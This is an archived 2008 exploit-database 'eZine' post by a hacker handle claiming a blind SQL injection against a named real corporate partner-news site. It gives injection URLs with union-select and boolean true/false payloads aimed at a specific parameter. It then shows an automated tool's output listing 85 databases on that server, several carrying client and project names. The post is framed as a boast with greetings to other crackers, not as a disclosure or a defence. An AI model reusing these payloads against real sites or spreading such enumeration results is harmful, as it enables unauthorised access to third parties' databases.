[eZine] CraCkEr #1

EDB-ID:

13020

CVE:

N/A

Author:

CraCkEr

Type:

papers

Platform:

eZine

Published:

2008-10-07

???????????????????????????????????????????????????????????????????????????????
??                             C r a C k E r                                ??
??          T H E   C R A C K   O F   E T E R N A L   M I G H T             ??
??????????????????????????????????????????????????????????????????????????????

 ?????      From The Ashes and Dust Rises An Unimaginable crack....      ?????
??????????????????????????????????????????????????????????????????????????????
??                                 [ EZINE ]                                ??
??????????????????????????????????????????????????????????????????????????????
:   Author   : CraCkEr                : :                                    :
?   Website  : symantec.com           ? ?         Famous Sites Can Be        ?
?   Vuln Type: Blind SQL Injection    ? ?                                    ?
?   Method   : GET                    ? ?             Olso Vulned            ?
?   Critical : High [????????]        ? ?                                    ?
?   Impact   : Database access        ? ?                                    ?
? ????????????????????????????????????? ???????????????????????????????????? ?
?                              DALnet #crackers                             ??
??????????????????????????????????????????????????????????????????????????????
:                                                                            :
?  Release Notes:                                                            ?
?  ?????????????                                                             ?
?  Typically used for remotely exploitable vulnerabilities that can lead to  ?
?  system compromise.                                                        ?
?                                                                            ?

??????????????????????????????????????????????????????????????????????????????
??                             Exploit URL's                                ??
??????????????????????????????????????????????????????????????????????????????

[+] Remote SQL
  
http://partnernews.symantec.com/2008/03/index.php?p=lp&l=-1 union select 1,2,3--


[+] Blind SQL

http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=1

http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=0


[+] Text Change

Bedriftsfordelene ved sosiale nettverk


[+] Attack Results


[+] URL:http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 18:00:05
[+] Number of Rows: 85
[0]: hv_kompaktseminar_2008 
[1]: 3ds_statistics 
[2]: channelevent 
[3]: cpu_expertenforum_2008 
[4]: cpu_xmas_2007 
[5]: db_bt 
[6]: db_bt2008 
[7]: db_elearning 
[8]: db_elearning2 
[9]: db_farbreiz 
[10]: db_hpcd 
[11]: db_jsdesk 
[12]: db_pepper_oktoberfest2008 
[13]: db_ship 
[14]: db_shop 
[15]: db_shrek 
[16]: db_shrek_handover 
[17]: db_symantec 
[18]: db_wordstock 
[19]: demo_3ds_statistics 
[20]: demo_ajaxfb 
[21]: demo_bettgefluester 
[22]: demo_compel_bs 
[23]: demo_compel_tec 
[24]: demo_db_elearning 
[25]: demo_hp_smb_portal 
[26]: demo_hpsmartportal 
[27]: demo_hpsmartportal_at 
[28]: demo_hpsmartportal_at_ch 
[29]: demo_hpsmartportal_ch 
[30]: demo_hpsmartportal_de 
[31]: demo_hpsmartportal_nl 
[32]: demo_hpsmartportal_nl_int 
[33]: demo_iqpower 
[34]: demo_kanalm 
[35]: demo_panadress 
[36]: demo_panadress_old 
[37]: demo_pepper_joomla 
[38]: demo_pepper_website 
[39]: demo_pepperglobal 
[40]: demo_pepperglobal_new 
[41]: demo_phpproject 
[42]: demo_preferred 
[43]: demo_preferred_demo 
[44]: demo_symantec 
[45]: demo_test 
[46]: demo_zukunftspodium 
[47]: hp_elearning 
[48]: hp_elearning_2 
[49]: hp_mobiles-rechenzentrum 
[50]: hp_mobiles-rechenzentrum_handover 
[51]: hp_smb_portal 
[52]: hv_management_2007 
[53]: hv_management_2008 
[54]: linde_ltip_08 
[55]: linde_mtip_07 
[56]: linde_tilia_edm 
[57]: mysql 
[58]: oktoberfest2007 
[59]: oktoberfest_2008 
[60]: opengeodb 
[61]: partnernews_sep09 
[62]: pepperglobal 
[63]: pepperglobal_new 
[64]: pepperglobal_statistics 
[65]: phpmyadmin 
[66]: preferred 
[67]: preferred_handover 
[68]: remoteshell 
[69]: robertdill 
[70]: symantec_ddc_2 
[71]: symantec_partnernews 
[72]: symantec_partnernews_0108 
[73]: symantec_partnernews_0208 
[74]: symantec_partnernews_0308 
[75]: symantec_partnernews_0408 
[76]: symantec_partnernews_0508 
[77]: symantec_partnernews_0608 
[78]: symantec_partnernews_0708 
[79]: symantec_partnernews_0908 
[80]: symantec_partnernews_handover 
[81]: symantec_wordstock 
[82]: tenovis_wcp_3_0 
[83]: transcat_statistics 
[84]: webcast_portal_3_3 
[-] 00:58:04
[-] Total URL Requests 10602
[-] Done

   
??????????????????????????????????????????????????????????????????????????????
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .

??????????????????????????????????????????????????????????????????????????????
??                              © CraCkEr 2008                              ??
??????????????????????????????????????????????????????????????????????????????


# milw0rm.com [2008-10-07]